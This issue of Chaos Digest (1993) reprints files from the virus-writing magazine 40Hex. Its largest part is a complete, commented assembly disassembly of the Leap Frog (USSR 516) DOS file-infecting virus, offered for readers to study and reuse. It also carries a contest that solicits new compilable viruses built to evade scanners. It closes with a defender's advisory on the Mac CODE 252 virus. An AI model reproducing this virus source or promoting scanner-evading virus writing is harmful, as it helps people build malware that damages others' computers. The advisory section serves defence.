Chaos Digest              Vendredi 25 Juin 1993        Volume 1 : Numero 62
                             ISSN  1244-4901

       Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
       Archiviste: Yves-Marie Crabbe
       Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.62 (25 Juin 1993)
File 1--40H VMag Number 7 Volume 2 Issue 3 #006-008(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
                linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
                    X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893.  Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

        * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
        * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
        * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
        * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
        * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
        * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
        * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
        * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission.  Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications.  Articles are preferred to short responses.  Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
            the views of the moderators. Chaos Digest contributors
            assume all responsibility for ensuring that articles
            submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 7 Volume 2 Issue 3 #006-008(1) (reprint)


40Hex Number 7 Volume 2 Issue 3                                     File 006

                         Virus Spotlite on: Leap Frog

It's always interesting to find new residency techniques.  I suppose everyone
by now is tired of the traditional high-memory loading routine and is on the
lookout for something different.  40Hex comes to the rescue!

This virus, the "Leap Frog" or USSR 516, has one of the most unique methods
I have ever seen.  I was mucking around in VSUM and noticed that it, according
to Patricia, it "installs itself in a hole in memory between MSDOS and the DOS
Stacks."  She is, of course, not telling us the entire story.  Leap Frog
basically latches onto and resides in a DOS disk buffer.  I do not know who
the author is, but I commend him for his innovative technique.  I took the
liberty of disassembling the virus which is given below.  It should be an
exact byte-for-byte matchup of the original carrier file (or at least should
be extremely similar).  The offsets are in their correct locations, etc, etc.
It is simple to understand and terribly efficient.

Although the coding is tight, there are some inconsistencies.  For
example, I do not understand the purpose of the timing routine(int 21h/ah=30h)
in the code.  I also do not understand why the author decided to infect COM
files in such an abnormal way.  An interesting "feature" is the disabling of
Control-Break checking - a thoroughly unnecessary piece of code.  I believe
further that the line above "findmarker" should read:

                lds     di,dword ptr ds:[30h*4]

In any case, the code is otherwise very, very good.  It is great for studying
by newcomers and "oldtimers" alike.  Things to look for:
  Residency routine
  Lack of extensive use of relative offsets
  Use of stack frame in the interrupt handler
  Critical error handler

Enjoy!                                           Dark Angel of PHALCON/SKISM

ussr516         segment byte public
                assume  cs:ussr516, ds:ussr516
                org     100h
;Disassembled by Dark Angel of PHALCON/SKISM
;for 40Hex Number 7 Volume 2 Issue 3
stub:           db      0e9h, 0, 0
                db      0e9h, 1, 0, 0
;This is where the virus really begins
start:
                push    ax
                call    beginvir

orig4           db      0cdh, 20h, 0, 0
int30store      db      0, 0, 0, 0                     ;Actually it's int 21h
                                                       ;entry point
int21store      db      0, 0, 0, 0

beginvir:       pop     bp                             ;BP -> orig4
                mov     si,bp
                mov     di,103h
                add     di,[di-2]                      ;DI -> orig4
                movsw                                  ;restore original
                movsw                                  ;4 bytes of program
                xor     si,si
                mov     ds,si
                les     di,dword ptr ds:[21h*4]
                mov     [bp+8],di                      ;int21store
                mov     [bp+0Ah],es
                lds     di,dword ptr ds:[30h*4+1]      ;Bug????
findmarker:
                inc     di
                cmp     word ptr [di-2],0E18Ah         ;Find marker bytes
                jne     findmarker                     ;to the entry point
                mov     [bp+4],di                      ;and move to
                mov     [bp+6],ds                      ;int30store
                mov     ax,5252h                       ;Get list of lists
                int     21h                            ;and also ID check

                add     bx,12h                         ;Already installed?
                jz      quitvir                        ;then exit
                push    bx
                mov     ah,30h                         ;Get DOS version
                int     21h

                pop     bx                             ;bx = 12, ptr to 1st
                                                       ;disk buffer
                cmp     al,3
                je      handlebuffer                   ;if DOS 3
                ja      handleDBHCH                    ;if > DOS 3
                inc     bx                             ;DOS 2.X, offset is 13
handlebuffer:
                push    ds
                push    bx
                lds     bx,dword ptr [bx]              ;Get seg:off of buffer
                inc     si
                pop     di
                pop     es                             ;ES:DI->seg:off buff
                mov     ax,[bx]                        ;ptr to next buffer
                cmp     ax,0FFFFh                      ;least recently used?
                jne     handlebuffer                   ;if not, go find it
                cmp     si,3
                jbe     quitvir
                stosw
                stosw
                jmp     short movetobuffer
handleDBHCH:   ;Disk Buffer Hash Chain Head array
                lds     si,dword ptr [bx]              ;ptr to disk buffer
                lodsw                                  ;info
                lodsw                                  ;seg of disk buffer
                                                       ;hash chain head array
                inc     ax                             ;second entry
                mov     ds,ax
                xor     bx,bx
                mov     si,bx
                lodsw                                  ;EMS page, -1 if not
                                                       ;in EMS
                xchg    ax,di                          ;save in di
                lodsw                                  ;ptr to least recently
                                                       ;used buffer
                mov     [di+2],ax                      ;change disk buffer
                                                       ;backward offset to
                                                       ;least recently used
                xchg    ax,di                          ;restore EMS page
                mov     [di],ax                        ;set to least recently
movetobuffer:                                          ;used
                mov     di,bx
                push    ds
                pop     es                             ;ES:DI -> disk buffer
                push    cs
                pop     ds
                mov     cx,108h
                lea     si,[bp-4]                      ;Copy from start
                rep     movsw
                mov     ds,cx                          ;DS -> interrupt table
                mov     word ptr ds:[4*21h],0BCh       ;New interrupt handler
                mov     word ptr ds:[4*21h+2],es       ;at int21
quitvir:
                push    cs                             ;CS = DS = ES
                pop     es
                push    es
                pop     ds
                pop     ax
                mov     bx,ax
                mov     si, 100h                       ;set up stack for
                push    si                             ;the return to the
                retn                                   ;original program
int24:
                mov     al,3                           ;Ignore all errors
                iret
tickstore       db      3                              ;Why???
buffer          db      3, 0, 9, 0

int21:
                pushf
                cli                                    ;CP/M style call entry
                call    dword ptr cs:[int30store-start]
                retn                                   ;point of int 21h

int21DSDX:                                             ;For int 21h calls
                push    ds                             ;with
                lds     dx,dword ptr [bp+2]            ;DS:DX -> filename
                call    int21
                pop     ds
                retn

                cmp     ax,4B00h                       ;Execute
                je      Execute
                cmp     ax,5252h                       ;ID check
                je      CheckID
                cmp     ah,30h                         ;DOS Version
                je      DosVersion
callorig21:                                            ;Do other calls
                jmp     dword ptr cs:[int21store-start]
DosVersion:     ;Why?????                              ;DOS Version
                dec     byte ptr cs:[tickstore-start]
                jnz     callorig21                     ;Continue if not 0
                push    es
                xor     ax,ax
                push    ax
                mov     es,ax
                mov     al,es:[46Ch]                   ; 40h:6Ch = Timer ticks
                                                       ; since midnight
                and     al,7                           ; MOD 15
                inc     ax
                inc     ax
                mov     cs:[tickstore-start],al        ;# 2-17
                pop     ax
                pop     es
                iret
CheckID:                                               ;ID Check
                mov     bx,0FFEEh                      ;FFEEh = -12h
                iret
Execute:                                               ;Execute
                push    ax                             ;Save registers
                push    cx
                push    es
                push    bx
                push    ds                             ;DS:DX -> filename
                push    dx                             ;save it on stack
                push    bp
                mov     bp,sp                          ;Set up stack frame
                sub     sp,0Ah                         ;Temporary variables
                                                       ;[bp-A] = attributes
                                                       ;[bp-8] = int 24 off
                                                       ;[bp-6] = int 24 seg
                                                       ;[bp-4] = file time
                                                       ;[bp-2] = file date
                sti
                push    cs
                pop     ds
                mov     ax,3301h                       ;Turn off ^C check
                xor     dl,dl                          ;(never turn it back
                call    int21                          ; on.  Bug???)
                mov     ax,3524h                       ;Get int 24h
                call    int21                          ;(Critical error)
                mov     [bp-8],bx
                mov     [bp-6],es
                mov     dx,int24-start
                mov     ax,2524h                       ;Set to new one
                call    int21
                mov     ax,4300h                       ;Get attributes
                call    int21DSDX
                jnc     continue
doneinfect:
                mov     ax,2524h                       ;Restore crit error
                lds     dx,dword ptr [bp-8]            ;handler
                call    int21
                cli
                mov     sp,bp
                pop     bp
                pop     dx
                pop     ds
                pop     bx
                pop     es
                pop     cx
                pop     ax
                jmp     short callorig21               ;Call orig handler
continue:
                mov     [bp-0Ah],cx                    ;Save attributes
                test    cl,1                           ;Check if r/o????
                jz      noclearattr
                xor     cx,cx
                mov     ax,4301h                       ;Clear attributes
                call    int21DSDX                      ;Filename in DS:DX
                jc      doneinfect                     ;Quit on error
noclearattr:
                mov     ax,3D02h                       ;Open read/write
                call    int21DSDX                      ;Filename in DS:DX
                jc      doneinfect                     ;Exit if error
                mov     bx,ax
                mov     ax,5700h                       ;Save time/date
                call    int21
                mov     [bp-4],cx
                mov     [bp-2],dx
                mov     dx,buffer-start
                mov     cx,4
                mov     ah,3Fh                         ;Read 4 bytes to
                call    int21                          ;buffer
                jc      quitinf
                cmp     byte ptr ds:[buffer-start],0E9h;Must start with 0E9h
                jne     quitinf                        ;Otherwise, quit
                mov     dx,word ptr ds:[buffer+1-start];dx = jmploc
                dec     dx
                xor     cx,cx
                mov     ax,4201h                       ;go there
                call    int21
                mov     ds:[buffer-start],ax           ;new location offset
                mov     dx,orig4-start
                mov     cx,4
                mov     ah,3Fh                         ;Read 4 bytes there
                call    int21
                mov     dx,ds:[orig4-start]
                cmp     dl,0E9h                        ;0E9h means we might
                jne     infect                         ;already be there
                mov     ax,ds:[orig4+2-start]          ;continue checking
                add     al,dh                          ;to see if we really
                sub     al,ah                          ;are there.
                jz      quitinf
infect:
                xor     cx,cx
                mov     dx,cx
                mov     ax,4202h                       ;Go to EOF
                call    int21
                mov     ds:[buffer+2-start],ax         ;save filesize
                mov     cx,204h
                mov     ah,40h                         ;Write virus
                call    int21
                jc      quitinf                        ;Exit if error
                sub     cx,ax
                jnz     quitinf
                mov     dx,ds:[buffer-start]
                mov     ax,ds:[buffer+2-start]
                sub     ax,dx
                sub     ax,3                           ;AX->jmp offset
                mov     word ptr ds:[buffer+1-start],ax;Set up buffer
                mov     byte ptr ds:[buffer-start],0E9h;code the jmp
                add     al,ah
                mov     byte ptr ds:[buffer+3-start],al
                mov     ax,4200h                       ;Rewind to jmploc
                call    int21
                mov     dx, buffer-start
                mov     cx,4                           ;Write in the jmp
                mov     ah,40h
                call    int21
quitinf:
                mov     cx,[bp-4]
                mov     dx,[bp-2]
                mov     ax,5701h                       ;Restore date/time
                call    int21
                mov     ah,3Eh                         ;Close file
                call    int21
                mov     cx,[bp-0Ah]                    ;Restore attributes
                mov     ax,4301h
                call    int21DSDX
                jmp     doneinfect                     ;Return
ussr516         ends
                end     stub

+++++

40Hex Number 7 Volume 2 Issue 3                                     File 007

Just a friendly reminder:

                        ------------------------
                             Virus Contest!
                           'The Spammies(tm)'
                        ------------------------
                        Deadline: July 4th, 1992


   This is the first PHALCON/SKISM virus contest.  As a matter of fact, this
is the first contest of its kind.  We believe that it will motivate you to
produce more original code, rather than more hacks.  Winners may have already
won $10,000,000, as well as the prestige of winning the first ever 'Spammie'
awards.


Rules and Regulations:
1)  All submissions must be original source code. (no hacks)
2)  Only one submission is allowed per programmer, plus one group project.
3)  All viruses must be recieved by us before July 4th, 1992.
4)  Viruses must be accompanied by a complete entry form. (see below)
5)  The original, compilable, commented source MUST be included, along with an
    installer program, or a dropper, in the case of boot block viruses.
6)  Entries must include a location where the author may be contacted, such as
    an email address or a BBS.
7)  Personnel or persons related to personnel of PHALCON/SKISM are not
    eligable.
8)  The source must compile without error under Tasm or Masm (please specify
    what assembler and version you used, along with the necessary command line
    switches).  If we cannot compile your virus, it will be disqualified.
9)  All entries recieve a free subscription to 40hex.  (hehehehe)
10) The entry must be uploaded privately to the sysop, stating that it is a
    contest entry.
11) The viruses must not be detectable by the current version (as of July 4th)
    of any known virus scanner.
12) Viruses will be judged by our 'panel of experts' in three catagories.
    6.1)  Stealth
    6.2)  Size
    6.3)  Reproductivity
    6.4)  Performance
        For example, Red Cross is an example of a 'high performance' virus.
        It was entertaining and well done.

*** Entry Form

Handle ________________________
Group Afiliation ______________
Virus Name ____________________
Size ____bytes (if you need more spaces, go away)
Type               ___ File Infector ___ Boot block
Infection method   ___ Direct Action ___ Memory Resident   ___ Directory chain
                   ___ Other (please describe it in detail)
Encryption routine ___ None (bah)    ___ Xor loop
                   ___ Other (please describe it in detail)

Describe what makes your infection routine unique.
______________________________________________________________________________
_
______________________________________________________________________________
_
Describe what makes your encryption routine unique.
______________________________________________________________________________
_
______________________________________________________________________________
_
Describe what means your virus uses, other than encryption, to keep itself
hidden.
______________________________________________________________________________
_
______________________________________________________________________________
_
What is the largest possible scan string for this virus?  __bytes

What else sets this virus apart from other viruses?
______________________________________________________________________________
_
______________________________________________________________________________
_
______________________________________________________________________________
_

+++++

40Hex Number 7 Volume 2 Issue 3                                       File 008


More Virus News.  An informed virus Programmer is a good one.

Article 1:   New Macintosh Virus
Article 2:   RockSteady's 666 Virus [NuKE]
Article 3:   A Stooge's View


<<<<<<<<<
Article 1
<<<<<<<<<

Date:    Fri, 17 Apr 92 11:34:50 -0500
>From:    Gene Spafford <spaf@cs.purdue.edu>
Subject: Mac announcement - new virus (Mac)

                    New Macintosh Virus Discovered
                            17 April 1992

Virus: CODE 252
Damage: some, possibly severe (see text)
Spread: unknown (see text)
Systems affected: Apple Macintosh computers. All types, but see text.

A new virus, which has been designated "CODE 252", has been discovered
on Apple Macintosh computer systems. This virus is designed to trigger
if an infected application is run or system booted between June 6 and
December 31, inclusive.  When triggered, the virus brings up a dialog
box with the message:
   You have a virus.
   Ha Ha Ha Ha Ha Ha Ha
   Now erasing all disks...
   Ha Ha Ha Ha Ha Ha Ha
   P.S. Have a nice day.
   Ha Ha Ha Ha Ha Ha Ha
   (Click to continue...)

Despite this message, no files or directories are deleted in the
versions of the virus we have seen; however, a worried user might
power down the system upon seeing the message, and thus corrupt the
disk -- this could lead to significant damage.  Furthermore, the virus
may interact with some applications in such a manner as to damage them.

Under System 7, the System file can be seriously damaged by the virus
under at least some circumstances as the virus attempts to spread.
This may lead to a system that will not boot, crashes, or other
unusual behavior.

Between January 1 and June 5, inclusive, the virus simply spreads from
applications to system files, and then on to other application files.
At the present moment, we have no indication that the virus causes
direct damage to any existing applications.

The virus does not spread to other applications under MultiFinder on
System 6.x systems, nor will it spread under System 7.  However, it
will run on those systems if an infected application is executed.
Even if you are running one of these systems, we recommend you obtain
an use one of latest versions of appropriate anti-virus software.

As of the date of this announcement (17 April 92), we have had limited
reported sightings of this virus.  This, combined with the nature of
operation of the virus, leads us to believe that the virus is not yet
widespread.

The current versions of Gatekeeper and SAM Intercept (in advanced and
custom mode) are effective against this virus.  Either program should
generate an alert if the virus is present and attempts to spread to
other files.  The Virex Record/Scan feature will also detect the virus.

Authors of all major Macintosh anti-virus tools are planning updates
to their tools to locate and/or eliminate this virus. Some of these
are listed below. We recommend that you obtain and run a CURRENT
version of AT LEAST ONE of these programs.

Some specific information on updated Mac anti-virus products follows:

Tool: Disinfectant
Status: Free software (courtesy of Northwestern University and
John Norstad)
Revision to be released: 2.8
Where to find: usual archive sites and bulletin boards --
               ftp.acns.nwu.edu, sumex-aim.stanford.edu,
               rascal.ics.utexas.edu, AppleLink, America Online,
               CompuServe, Genie, Calvacom, MacNet, Delphi,
               comp.binaries.mac
When available: soon


Tool: Gatekeeper
Status: Free software (courtesy of Chris Johnson)
Revision to be released: 1.2.6 (probably)
Where to find: usual archive sites and bulletin boards --
               microlib.cc.utexas.edu, sumex-aim.stanford.edu,
               rascal.ics.utexas.edu, comp.binaries.mac
When available: eventually
Comments:
Gatekeeper should find this virus if it attempts to infect your
system or applications, and thus does not need an update.
Gatekeeper Aid will need an update to "know" exactly what virus it
is seeing so it can remove the virus, but the update is not
crucial for continued protection.  As Gatekeeper is freeware and
Chris has a "real" life, this update may not be immediate.


Tool: Rival
Status: Commercial software
Revision to be released: Rival 1.1.9v (CODE 252 Vaccine or Refresh 1.1.9v)
Where to find it: AppleLink, America Online, Internet, Compuserve.
When available: Immediately.


Tool: SAM (Virus Clinic and Intercept)
Status: Commercial software
Revision to be released: 3.0.8
Where to find: CompuServe, America Online, Applelink, Symantec's
               Bulletin Board @ 408-973-9598
When available: 17 April 1992.  Version 3.0.8 of the Virus
                Definitions file are also available.


Tool: Virex INIT
Status: Commercial software
Revision to be released: 3.8
Where to find: Microcom, Inc (919) 490-1277
When available: Immediately.
Comments:
Virex 3.8 will detect and repair the virus. All
Virex subscribers will automatically be sent an update on
diskette. All other registered users will receive a notice with
information to update prior versions to be able to detect
CODE 252. This information is also available on Microcom's BBS.
(919)419-1602, and is presented here:
          Guide Number = 6324448
          1: 0203 3001 7778 2A00 / 79
          2: 0C50 4EFA 0003 A9AB / C4
          3: 0004 A9AA 0002 A647 / B2
          4: 8180 9090 9090 9090 / 1B

Tool: Virus Detective
Status: Shareware
  Revision to be released: 5.0.4
Where to find: Usual bulletin boards will announce a new search string.
               Registered users will also get a mailing
               with the new search string.
When available: Immediately.
Comments: search strings are:
Resource Start & Size < 1200 & WData 2F2C#23F3C#2A9A0*3F3C#24878#2A9AB;
For find CODE 252 in Appl's
Filetype=ZSYS & Resource INIT & Size < 1200 & WData 2F2C#
3F3C#2A9A0*3F3C#24878
#2A9AB; For find CODE 252 in System


If you discover what you believe to be a virus on your Macintosh
system, please report it to the vendor/author of your anti-virus
software package for analysis.  Such reports make early, informed
warnings like this one possible for the rest of the Mac community.

------------------------------

End of Chaos Digest #1.62
************************************
